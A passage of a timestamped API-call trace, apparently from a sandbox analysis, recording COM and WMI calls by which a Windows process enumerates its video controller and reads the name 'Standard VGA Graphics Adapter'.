Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x18990c | out: ppvObject=0x18990c*=0x0) returned 0x80004002 [0234.166] WbemLocator:IUnknown:AddRef (This=0x7a16fc) returned 0x3 [0234.166] WbemLocator:IUnknown:QueryInterface (in: This=0x7a16fc, riid=0x749af90c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x18944c | out: ppvObject=0x18944c*=0x0) returned 0x80004002 [0234.166] WbemLocator:IUnknown:QueryInterface (in: This=0x7a16fc, riid=0x749af860*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x1893fc | out: ppvObject=0x1893fc*=0x0) returned 0x80004002 [0234.167] WbemLocator:IUnknown:QueryInterface (in: This=0x7a16fc, riid=0x7499c350*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x189408 | out: ppvObject=0x189408*=0x7a165c) returned 0x0 [0234.167] WbemLocator:IMarshal:GetUnmarshalClass (in: This=0x7a165c, riid=0x7487e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x189410 | out: pCid=0x189410*(Data1=0x17, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0234.167] WbemLocator:IUnknown:Release (This=0x7a165c) returned 0x3 [0234.167] CoGetContextToken (in: pToken=0x189468 | out: pToken=0x189468) returned 0x0 [0234.167] CoGetContextToken (in: pToken=0x189870 | out: pToken=0x189870) returned 0x0 [0234.167] WbemLocator:IUnknown:QueryInterface (in: This=0x7a16fc, riid=0x749afb48*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x189900 | out: ppvObject=0x189900*=0x7a16e4) returned 0x0 [0234.167] WbemLocator:IRpcOptions:Query (in: This=0x7a16e4, pPrx=0x7a16fc, dwProperty=2, pdwValue=0x189928 | out: pdwValue=0x189928) returned 0x80004002 [0234.167] WbemLocator:IUnknown:Release (This=0x7a16e4) returned 0x3 [0234.167] WbemLocator:IUnknown:Release (This=0x7a16fc) returned 0x2 [0234.167] CoGetContextToken (in: pToken=0x189e48 | out: pToken=0x189e48) returned 0x0 [0234.167] CoGetContextToken (in: pToken=0x189da8 | out: pToken=0x189da8) returned 0x0 [0234.167] WbemLocator:IUnknown:QueryInterface (in: This=0x7a16fc, riid=0x189e78*(Data1=0x27947e1, Data2=0xd731, Data3=0x11ce, Data4=([0]=0xa3, [1]=0x57, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x1)), ppvObject=0x189e74 | out: ppvObject=0x189e74*=0x5b333a4) returned 0x0 [0234.167] IUnknown:AddRef (This=0x5b333a4) returned 0x4 [0234.167] IUnknown:Release (This=0x5b333a4) returned 0x3 [0234.167] IUnknown:Release (This=0x5b333a4) returned 0x2 [0234.167] WbemLocator:IUnknown:Release (This=0x5b2ff04) returned 0x2 [0234.167] SysStringLen (param_1=0x0) returned 0x0 [0234.167] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x5b20820, puCount=0x18a13c | out: puCount=0x18a13c*=0x2) returned 0x0 [0234.167] WbemDefPath:IWbemPath:GetText (in: This=0x5b20820, lFlags=4, puBuffLength=0x18a138*=0x0, pszText=0x0 | out: puBuffLength=0x18a138*=0xf, pszText=0x0) returned 0x0 [0234.167] WbemDefPath:IWbemPath:GetText (in: This=0x5b20820, lFlags=4, puBuffLength=0x18a138*=0xf, pszText="00000000000000" | out: puBuffLength=0x18a138*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0234.167] CoGetContextToken (in: pToken=0x189f90 | out: pToken=0x189f90) returned 0x0 [0234.167] IUnknown:AddRef (This=0x5b333a4) returned 0x3 [0234.167] IEnumWbemClassObject:Clone (in: This=0x5b333a4, ppEnum=0x18a14c | out: ppEnum=0x18a14c*=0x5b2ffa4) returned 0x0 [0234.185] IUnknown:QueryInterface (in: This=0x5b2ffa4, riid=0x73cf1104*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x18a010 | out: ppvObject=0x18a010*=0x5b2ffa8) returned 0x0 [0234.185] IClientSecurity:QueryBlanket (in: This=0x5b2ffa8, pProxy=0x5b2ffa4, pAuthnSvc=0x18a060, pAuthzSvc=0x18a05c, pServerPrincName=0x18a054, pAuthnLevel=0x18a058, pImpLevel=0x18a048, pAuthInfo=0x18a04c, pCapabilites=0x18a050 | out: pAuthnSvc=0x18a060*=0xa, pAuthzSvc=0x18a05c*=0x0, pServerPrincName=0x18a054, pAuthnLevel=0x18a058*=0x6, pImpLevel=0x18a048*=0x2, pAuthInfo=0x18a04c, pCapabilites=0x18a050*=0x1) returned 0x0 [0234.185] IUnknown:Release (This=0x5b2ffa8) returned 0x1 [0234.185] IUnknown:QueryInterface (in: This=0x5b2ffa4, riid=0x73cf10f4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x18a004 | out: ppvObject=0x18a004*=0x7a19cc) returned 0x0 [0234.185] IUnknown:QueryInterface (in: This=0x5b2ffa4, riid=0x73cf1104*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x18a000 | out: ppvObject=0x18a000*=0x5b2ffa8) returned 0x0 [0234.185] IClientSecurity:SetBlanket (This=0x5b2ffa8, pProxy=0x5b2ffa4, dwAuthnSvc=0xa, dwAuthzSvc=0x0, pServerPrincName=0x0, dwAuthnLevel=0x6, dwImpLevel=0x3, pAuthInfo=0x0, dwCapabilities=0x20) returned 0x0 [0234.188] IUnknown:Release (This=0x5b2ffa8) returned 0x2 [0234.188] WbemLocator:IUnknown:Release (This=0x7a19cc) returned 0x1 [0234.188] CoTaskMemFree (pv=0x7b5748) [0234.188] IUnknown:QueryInterface (in: This=0x5b2ffa4, riid=0x7487e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x189bec | out: ppvObject=0x189bec*=0x7a19cc) returned 0x0 [0234.188] WbemLocator:IUnknown:QueryInterface (in: This=0x7a19cc, riid=0x749afc00*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x189ba8 | out: ppvObject=0x189ba8*=0x0) returned 0x80004002 [0234.189] WbemLocator:IUnknown:QueryInterface (in: This=0x7a19cc, riid=0x749afe90*(Data1=0xb196b283, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x1899c4 | out: ppvObject=0x1899c4*=0x0) returned 0x80004002 [0234.189] WbemLocator:IUnknown:AddRef (This=0x7a19cc) returned 0x3 [0234.189] WbemLocator:IUnknown:QueryInterface (in: This=0x7a19cc, riid=0x749af90c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x189504 | out: ppvObject=0x189504*=0x0) returned 0x80004002 [0234.189] WbemLocator:IUnknown:QueryInterface (in: This=0x7a19cc, riid=0x749af860*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x1894b4 | out: ppvObject=0x1894b4*=0x0) returned 0x80004002 [0234.190] WbemLocator:IUnknown:QueryInterface (in: This=0x7a19cc, riid=0x7499c350*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1894c0 | out: ppvObject=0x1894c0*=0x7a192c) returned 0x0 [0234.190] WbemLocator:IMarshal:GetUnmarshalClass (in: This=0x7a192c, riid=0x7487e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x1894c8 | out: pCid=0x1894c8*(Data1=0x17, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0234.190] WbemLocator:IUnknown:Release (This=0x7a192c) returned 0x3 [0234.190] CoGetContextToken (in: pToken=0x189520 | out: pToken=0x189520) returned 0x0 [0234.190] CoGetContextToken (in: pToken=0x189928 | out: pToken=0x189928) returned 0x0 [0234.190] WbemLocator:IUnknown:QueryInterface (in: This=0x7a19cc, riid=0x749afb48*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1899b8 | out: ppvObject=0x1899b8*=0x7a19b4) returned 0x0 [0234.190] WbemLocator:IRpcOptions:Query (in: This=0x7a19b4, pPrx=0x7a19cc, dwProperty=2, pdwValue=0x1899e0 | out: pdwValue=0x1899e0) returned 0x80004002 [0234.190] WbemLocator:IUnknown:Release (This=0x7a19b4) returned 0x3 [0234.190] WbemLocator:IUnknown:Release (This=0x7a19cc) returned 0x2 [0234.190] CoGetContextToken (in: pToken=0x189f00 | out: pToken=0x189f00) returned 0x0 [0234.190] CoGetContextToken (in: pToken=0x189e60 | out: pToken=0x189e60) returned 0x0 [0234.190] WbemLocator:IUnknown:QueryInterface (in: This=0x7a19cc, riid=0x189f30*(Data1=0x27947e1, Data2=0xd731, Data3=0x11ce, Data4=([0]=0xa3, [1]=0x57, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x1)), ppvObject=0x189f2c | out: ppvObject=0x189f2c*=0x5b2ffa4) returned 0x0 [0234.190] IUnknown:AddRef (This=0x5b2ffa4) returned 0x4 [0234.190] IUnknown:Release (This=0x5b2ffa4) returned 0x3 [0234.190] IUnknown:Release (This=0x5b2ffa4) returned 0x2 [0234.190] IUnknown:Release (This=0x5b333a4) returned 0x2 [0234.190] SysStringLen (param_1=0x0) returned 0x0 [0234.190] IEnumWbemClassObject:Reset (This=0x5b2ffa4) returned 0x0 [0234.191] CoTaskMemAlloc (cb=0x4) returned 0x7e1f30 [0234.191] IEnumWbemClassObject:Next (in: This=0x5b2ffa4, lTimeout=-1, uCount=0x1, apObjects=0x7e1f30, puReturned=0x27a3ca8 | out: apObjects=0x7e1f30*=0x5b35bd8, puReturned=0x27a3ca8*=0x1) returned 0x0 [0234.273] IUnknown:QueryInterface (in: This=0x5b35bd8, riid=0x7487e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1897a8 | out: ppvObject=0x1897a8*=0x5b35bd8) returned 0x0 [0234.273] IUnknown:QueryInterface (in: This=0x5b35bd8, riid=0x749afc00*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x189764 | out: ppvObject=0x189764*=0x0) returned 0x80004002 [0234.273] IUnknown:QueryInterface (in: This=0x5b35bd8, riid=0x749afe90*(Data1=0xb196b283, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x189584 | out: ppvObject=0x189584*=0x0) returned 0x80004002 [0234.273] IUnknown:AddRef (This=0x5b35bd8) returned 0x3 [0234.274] IUnknown:QueryInterface (in: This=0x5b35bd8, riid=0x749af90c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x1890c4 | out: ppvObject=0x1890c4*=0x0) returned 0x80004002 [0234.274] IUnknown:QueryInterface (in: This=0x5b35bd8, riid=0x749af860*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x189074 | out: ppvObject=0x189074*=0x0) returned 0x80004002 [0234.274] IUnknown:QueryInterface (in: This=0x5b35bd8, riid=0x7499c350*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x189080 | out: ppvObject=0x189080*=0x5b35bdc) returned 0x0 [0234.274] IMarshal:GetUnmarshalClass (in: This=0x5b35bdc, riid=0x7487e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x189088 | out: pCid=0x189088*(Data1=0x4590f812, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24))) returned 0x0 [0234.274] IUnknown:Release (This=0x5b35bdc) returned 0x3 [0234.274] CoGetContextToken (in: pToken=0x1890e0 | out: pToken=0x1890e0) returned 0x0 [0234.274] CoGetContextToken (in: pToken=0x1894e8 | out: pToken=0x1894e8) returned 0x0 [0234.274] IUnknown:QueryInterface (in: This=0x5b35bd8, riid=0x749afb48*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x189578 | out: ppvObject=0x189578*=0x0) returned 0x80004002 [0234.274] IUnknown:Release (This=0x5b35bd8) returned 0x2 [0234.274] CoGetContextToken (in: pToken=0x189ab8 | out: pToken=0x189ab8) returned 0x0 [0234.274] CoGetContextToken (in: pToken=0x189a18 | out: pToken=0x189a18) returned 0x0 [0234.274] IUnknown:QueryInterface (in: This=0x5b35bd8, riid=0x189ae8*(Data1=0xdc12a681, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppvObject=0x189ae4 | out: ppvObject=0x189ae4*=0x5b35bd8) returned 0x0 [0234.274] IUnknown:AddRef (This=0x5b35bd8) returned 0x4 [0234.274] IUnknown:Release (This=0x5b35bd8) returned 0x3 [0234.274] IUnknown:Release (This=0x5b35bd8) returned 0x2 [0234.274] CoTaskMemFree (pv=0x7e1f30) [0234.274] CoGetContextToken (in: pToken=0x189e28 | out: pToken=0x189e28) returned 0x0 [0234.274] IUnknown:AddRef (This=0x5b35bd8) returned 0x3 [0234.274] IWbemClassObject:Get (in: This=0x5b35bd8, wszName="__GENUS", lFlags=0, pVal=0x18a138*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x18a1b8*=0, plFlavor=0x18a1b4*=0 | out: pVal=0x18a138*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x2, varVal2=0x0), pType=0x18a1b8*=3, plFlavor=0x18a1b4*=64) returned 0x0 [0234.274] IWbemClassObject:Get (in: This=0x5b35bd8, wszName="__PATH", lFlags=0, pVal=0x18a11c*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x18a1a0*=0, plFlavor=0x18a19c*=0 | out: pVal=0x18a11c*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="\\\\YKYD69Q\\root\\cimv2:Win32_VideoController.DeviceID=\"VideoController1\"", varVal2=0x0), pType=0x18a1a0*=8, plFlavor=0x18a19c*=64) returned 0x0 [0234.274] SysStringByteLen (bstr="\\\\YKYD69Q\\root\\cimv2:Win32_VideoController.DeviceID=\"VideoController1\"") returned 0x8c [0234.274] SysStringByteLen (bstr="\\\\YKYD69Q\\root\\cimv2:Win32_VideoController.DeviceID=\"VideoController1\"") returned 0x8c [0234.275] CoGetObjectContext (in: riid=0x27987bc*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x18a148 | out: ppv=0x18a148*=0x766114) returned 0x0 [0234.275] IComThreadingInfo:GetCurrentApartmentType (in: This=0x766114, pAptType=0x18a140 | out: pAptType=0x18a140*=1) returned 0x0 [0234.275] IUnknown:QueryInterface (in: This=0x766114, riid=0x27987a4*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x18a144 | out: ppvObject=0x18a144*=0x0) returned 0x80004002 [0234.275] IUnknown:Release (This=0x766114) returned 0x1 [0234.275] CoGetClassObject (in: rclsid=0x7b5544*(Data1=0xcf4cc405, Data2=0xe2c5, Data3=0x4ddd, Data4=([0]=0xb3, [1]=0xce, [2]=0x5e, [3]=0x75, [4]=0x82, [5]=0xd8, [6]=0xc9, [7]=0xfa)), dwClsContext=0x15, pvReserved=0x0, riid=0x7490d1fc*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x189ab0 | out: ppv=0x189ab0*=0x5b2ffe0) returned 0x0 [0234.276] WbemDefPath:IUnknown:QueryInterface (in: This=0x5b2ffe0, riid=0x74940ae0*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x189cc8 | out: ppvObject=0x189cc8*=0x0) returned 0x80004002 [0234.276] WbemDefPath:IClassFactory:CreateInstance (in: This=0x5b2ffe0, pUnkOuter=0x0, riid=0x7487e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x189cdc | out: ppvObject=0x189cdc*=0x5b2fff0) returned 0x0 [0234.276] WbemDefPath:IUnknown:Release (This=0x5b2ffe0) returned 0x0 [0234.276] WbemDefPath:IUnknown:QueryInterface (in: This=0x5b2fff0, riid=0x7487e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1898fc | out: ppvObject=0x1898fc*=0x5b2fff0) returned 0x0 [0234.276] WbemDefPath:IUnknown:QueryInterface (in: This=0x5b2fff0, riid=0x749afc00*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x1898b8 | out: ppvObject=0x1898b8*=0x0) returned 0x80004002 [0234.276] WbemDefPath:IUnknown:AddRef (This=0x5b2fff0) returned 0x3 [0234.276] WbemDefPath:IUnknown:QueryInterface (in: This=0x5b2fff0, riid=0x749af90c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x189214 | out: ppvObject=0x189214*=0x0) returned 0x80004002 [0234.276] WbemDefPath:IUnknown:QueryInterface (in: This=0x5b2fff0, riid=0x749af860*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x1891c4 | out: ppvObject=0x1891c4*=0x0) returned 0x80004002 [0234.276] WbemDefPath:IUnknown:QueryInterface (in: This=0x5b2fff0, riid=0x7499c350*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1891d0 | out: ppvObject=0x1891d0*=0x7e1f30) returned 0x0 [0234.276] WbemDefPath:IMarshal:GetUnmarshalClass (in: This=0x7e1f30, riid=0x7487e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x1891d8 | out: pCid=0x1891d8*(Data1=0x33a, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0234.276] WbemDefPath:IUnknown:Release (This=0x7e1f30) returned 0x3 [0234.276] CoGetContextToken (in: pToken=0x189230 | out: pToken=0x189230) returned 0x0 [0234.276] CoGetContextToken (in: pToken=0x189638 | out: pToken=0x189638) returned 0x0 [0234.276] WbemDefPath:IUnknown:QueryInterface (in: This=0x5b2fff0, riid=0x749afb48*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1896c8 | out: ppvObject=0x1896c8*=0x0) returned 0x80004002 [0234.276] WbemDefPath:IUnknown:Release (This=0x5b2fff0) returned 0x2 [0234.276] WbemDefPath:IUnknown:Release (This=0x5b2fff0) returned 0x1 [0234.276] CoGetContextToken (in: pToken=0x189fc0 | out: pToken=0x189fc0) returned 0x0 [0234.276] CoGetContextToken (in: pToken=0x189f20 | out: pToken=0x189f20) returned 0x0 [0234.276] WbemDefPath:IUnknown:QueryInterface (in: This=0x5b2fff0, riid=0x189ff0*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x189fec | out: ppvObject=0x189fec*=0x5b2fff0) returned 0x0 [0234.276] WbemDefPath:IUnknown:AddRef (This=0x5b2fff0) returned 0x3 [0234.276] WbemDefPath:IUnknown:Release (This=0x5b2fff0) returned 0x2 [0234.276] WbemDefPath:IWbemPath:SetText (This=0x5b2fff0, uMode=0x4, pszPath="\\\\YKYD69Q\\root\\cimv2:Win32_VideoController.DeviceID=\"VideoController1\"") returned 0x0 [0234.277] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x5b20820, puCount=0x18a174 | out: puCount=0x18a174*=0x2) returned 0x0 [0234.277] WbemDefPath:IWbemPath:GetText (in: This=0x5b20820, lFlags=4, puBuffLength=0x18a170*=0x0, pszText=0x0 | out: puBuffLength=0x18a170*=0xf, pszText=0x0) returned 0x0 [0234.277] WbemDefPath:IWbemPath:GetText (in: This=0x5b20820, lFlags=4, puBuffLength=0x18a170*=0xf, pszText="00000000000000" | out: puBuffLength=0x18a170*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0234.277] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x5b20820, puCount=0x18a13c | out: puCount=0x18a13c*=0x2) returned 0x0 [0234.277] WbemDefPath:IWbemPath:GetText (in: This=0x5b20820, lFlags=4, puBuffLength=0x18a138*=0x0, pszText=0x0 | out: puBuffLength=0x18a138*=0xf, pszText=0x0) returned 0x0 [0234.277] WbemDefPath:IWbemPath:GetText (in: This=0x5b20820, lFlags=4, puBuffLength=0x18a138*=0xf, pszText="00000000000000" | out: puBuffLength=0x18a138*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0234.277] IWbemClassObject:Get (in: This=0x5b35bd8, wszName="Name", lFlags=0, pVal=0x18a138*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x27a44f4*=0, plFlavor=0x27a44f8*=0 | out: pVal=0x18a138*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="Standard VGA Graphics Adapter", varVal2=0x0), pType=0x27a44f4*=8, plFlavor=0x27a44f8*=0) returned 0x0 [0234.277] SysStringByteLen (bstr="Standard VGA Graphics Adapter") returned 0x3a [0234.277] SysStringByteLen (bstr="Standard VGA Graphics Adapter") returned 0x3a [0234.277] IWbemClassObject:Get (in: This=0x5b35bd8, wszName="Name", lFlags=0, pVal=0x18a140*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x27a44f4*=8, plFlavor=0x27a44f8*=0 | out: pVal=0x18a140*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="Standard VGA Graphics Adapter", varVal2=0x0), pType=0x27a44f4*=8, plFlavor=0x27a44f8*=0) returned 0x0 [0234.277] SysStringByteLen (bstr="Standard VGA Graphics Adapter") returned 0x3a [0234.277] SysStringByteLen (bstr="Standard VGA Graphics Adapter") returned 0x3a [0234.277] CoGetContextToken (in: pToken=0x18a048 | out: pToken=0x18a048) returned 0x0 [0234.277] WbemLocator:IUnknown:Release (This=0x7a19cc) returned 0x1 [0234.277] IUnknown:Release (This=0x5b2ffa4) returned 0x0 [0234.298] CoGetObjectContext (in: riid=0x27987bc*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x18a14c | out: ppv=0x18a14c*=0x766114) returned 0x0 [0234.298] IComThreadingInfo:GetCurrentApartmentType (in: This=0x766114, pAptType=0x18a144 | out: pAptType=0x18a144*=1) returned 0x0 [0234.298] IUnknown:QueryInterface (in: This=0x766114, riid=0x27987a4*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x18a148 | out: ppvObject=0x18a148*=0x0) returned 0x80004002 [0234.298] IUnknown:Release (This=0x766114) returned 0x1 [0234.299] CoGetClassObject (in: rclsid=0x7b5544*(Data1=0xcf4cc405, Data2=0xe2c5, Data3=0x4ddd, Data4=([0]=0xb3, [1]=0xce, [2]=0x5e, [3]=0x75, [4]=0x82, [5]=0xd8, [6]=0xc9, [7]=0xfa)), dwClsContext=0x15, pvReserved=0x0, riid=0x7490d1fc*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x189ab8 | out: ppv=0x189ab8*=0x5b30120) returned 0x0 [0234.299] WbemDefPath:IUnknown:QueryInterface (in: This=0x5b30120, riid=0x74940ae0*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x189cd0 | out: ppvObject=0x189cd0*=0x0) returned 0x80004002 [0234.299] 